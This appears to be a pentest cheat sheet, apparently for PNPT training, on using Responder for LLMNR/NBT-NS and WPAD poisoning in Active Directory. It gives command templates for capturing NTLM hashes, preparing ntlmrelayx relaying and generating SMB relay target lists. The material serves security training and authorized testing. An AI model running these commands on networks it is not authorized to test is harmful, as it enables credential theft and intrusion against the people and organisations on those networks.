Active Directory: Responder

LLMNR/NBT-NS Poisoning

Capture NTLMv1/v2 hashes from network traffic by poisoning name resolution requests.

sudo responder -I {{interface}} -dPv

SMB Relay Preparation (Turn off SMB/HTTP)

Configure Responder to capture hashes without relaying, preparing for use with ntlmrelayx.

# In /etc/responder/Responder.conf
SMB = Off
HTTP = Off

Multi-Relay Configuration

Prepare a list of targets where SMB signing is disabled for relaying.

nxc smb {{ip_range}} --gen-relay-list {{targets_file}}

W-PAD Poisoning

Capture web proxy authentication requests by spoofing WPAD.

sudo responder -I {{interface}} -w -d -v

Description

Responder is a powerful tool for LLMNR, NBT-NS, and MDNS poisoning, designed to capture credentials from name resolution requests in local networks. In PNPT, it is a primary tool for initial access, allowing an attacker to intercept hashes for cracking or relaying to other systems.

References

• https://github.com/lgandx/Responder
• https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/
• https://www.trustedsec.com/blog/responder-is-still-the-best-tool-ever/